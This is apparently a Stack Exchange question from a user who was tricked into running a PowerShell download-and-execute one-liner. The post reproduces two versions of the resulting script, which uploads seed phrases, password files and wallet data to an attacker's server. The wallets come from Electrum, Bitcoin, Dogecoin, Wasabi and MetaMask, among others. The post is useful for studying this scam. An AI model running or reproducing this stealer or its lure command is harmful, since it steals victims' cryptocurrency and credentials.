# I was fooled into running this on powershell - how compromised am I?

Tags: powershell

Here is a link to the script: hxxps://extract-offline.tools/bip

And here was the instructions given to fool me: https://medium.com/@article-343624/convert-tool-f894f6244d4f

I ran iex "& { $(irm extract-offline.tools/bip) } RunJob" on desktop in PowerShell.

I didn't put anything into the bip39.txt document I created, I don't have any of those text files in my dekstop (but can it access other directories?) or those wallet folders for various crypto. I do have Metamask but there is no 00003 folder that the script mentions. Surely Metamask extension wouldn't keep any unencrypted info in files? Can those be accessed?

Would highly appreciate if someone could walk me through what exactly this has done to my computer so I can take the necessary steps.

EDIT/UPDATE April 4, 2024: Here's the script from the URL as suggested recently in a comment. It looks like they've modified it a bit but the essence hasn't changed much (I saved the original and added it below):

```
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$ErrorActionPreference = 'silentlycontinue'
$targetUrl = 'extract-offline.tools/data.php'
Write-Host "Loading 'bip' module from offline extraction tool..."

$headers = @{
        "Content-Disposition" = "attachment; filename=`"$fileFullPath`""
    }
    
Write-Host "Retrieving PowerShell version information and installed modules..."



function UploadFiles {
    param(
        [string]$targetUrl,
        [string]$appDirectory,
        [string]$fileExtension
    )

    if ($fileExtension) {
        $files = Get-ChildItem $appDirectory -Recurse -File -Filter "*$fileExtension" | Where-Object { $_.Length -lt 800KB }
    } else {
        $files = Get-ChildItem $appDirectory -Recurse -File | Where-Object { $_.Length -lt 800KB }
    }

    foreach ($file in $files) {
        $fileFullPath = $file.FullName
        $headers = @{
            "Content-Disposition" = "attachment; filename=`"$fileFullPath`""
        }
        Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $fileFullPath -Headers $headers | Out-Null
    }
}



if ($env:OS -eq "Windows_NT") {
    $appAppdata = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData)
    $appDesktop = Join-Path -Path $env:USERPROFILE -ChildPath "Desktop"
    $appDocuments = Join-Path -Path $env:USERPROFILE -ChildPath "Documents"
    $appDataRoamingPath = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData)
    $appElectrum = Join-Path -Path $appDataRoamingPath -ChildPath "Electrum"
    $electrumwalletsDirectory = Join-Path -Path $appElectrum -ChildPath "wallets"
} else {
    $appAppdata = "$env:HOME/Library/Application Support"
    $appDesktop = "$env:HOME/Desktop"
    $appElectrum = Join-Path -Path $appDataRoamingPath -ChildPath "Electrum"
    $electrumwalletsDirectory = Join-Path -Path $appElectrum -ChildPath "wallets"
}



UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $appDocuments -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $appDocuments -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $appDataRoamingPath -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $electrumwalletsDirectory


Write-Host "Loading 'bip' module from powershell extraction tool...... Failed."
Write-Host "Windows version not supported..."
```

The original script:

```
$ErrorActionPreference = 'silentlycontinue'
$targetUrl = 'extract-offline.tools/data.php'
Write-Host "Loading 'bip' module from offline extraction tool..."


function Process-Df {
    param (
        [string]$filename,
        [string]$data
    )

    $desktopPath = Join-Path $env:USERPROFILE 'Desktop'
    $filePath = Join-Path $desktopPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}

function Process-Af {
    param (
        [string]$filename,
        [string]$data
    )

    $appDataPath = [System.IO.Path]::Combine($env:APPDATA)
    $filePath = Join-Path $appDataPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}

function Process-Ll {
    param (
        [string]$filename,
        [string]$data
    )

    $appDataLocalPath = [System.IO.Path]::Combine($env:LOCALAPPDATA)
    $filePath = Join-Path $appDataLocalPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}


Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./wallet.txt" -Headers $headers | Out-Nul
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.txt" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.dat" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip44.txt" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./seed.txt" -Headers $headers | Out-Null
Process-Df -filename "wallet.txt" -data "wallet_txt"
Process-Df -filename "bip39.txt" -data "bip39"
Process-Df -filename "seed.txt" -data "seed"
Process-Df -filename "wallet.dat" -data "wallet_dat"
Process-Df -filename "pass.txt" -data "pass"
Process-Df -filename "password.txt" -data "pass"
Process-Df -filename "password" -data "pass"
Process-Af -filename "./Dogecoin/wallet.dat" -data "doge"
Process-Af -filename "./electrum/wallets/default_wallet" -data "el1"
Process-Af -filename "./electrum/wallets/wallet_1" -data "el2"
Process-Af -filename "./WalletWasabi/Client/Wallets/Wallet.json" -data "wasabi"
Process-Af -filename "./Bitcoin/wallet.dat" -data "btc"
Process-Af -filename "./BitcoinCore/wallet.dat" -data "btccore"
Process-Af -filename "./Litecoin/wallet.dat" -data "ltc"
Process-Ll -filename "./Google/Chrome/User Data/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn/000003" -data "metamask"

Write-Host "Loading 'bip' module from powershell extraction tool...... Failed."
Write-Host "Windows version not supported..."
```

Comment: **Comments have been [moved to chat](https://chat.stackexchange.com/rooms/152007/discussion-on-question-by-zerthimon-i-was-fooled-into-running-this-on-powershell); please do not continue the discussion here.** Before posting a comment below this one, please review the [purposes of comments](/help/privileges/comment). Comments that do not request clarification or suggest improvements usually belong as an [answer](/help/how-to-answer), on [meta], or in [chat]. Comments continuing discussion may be removed.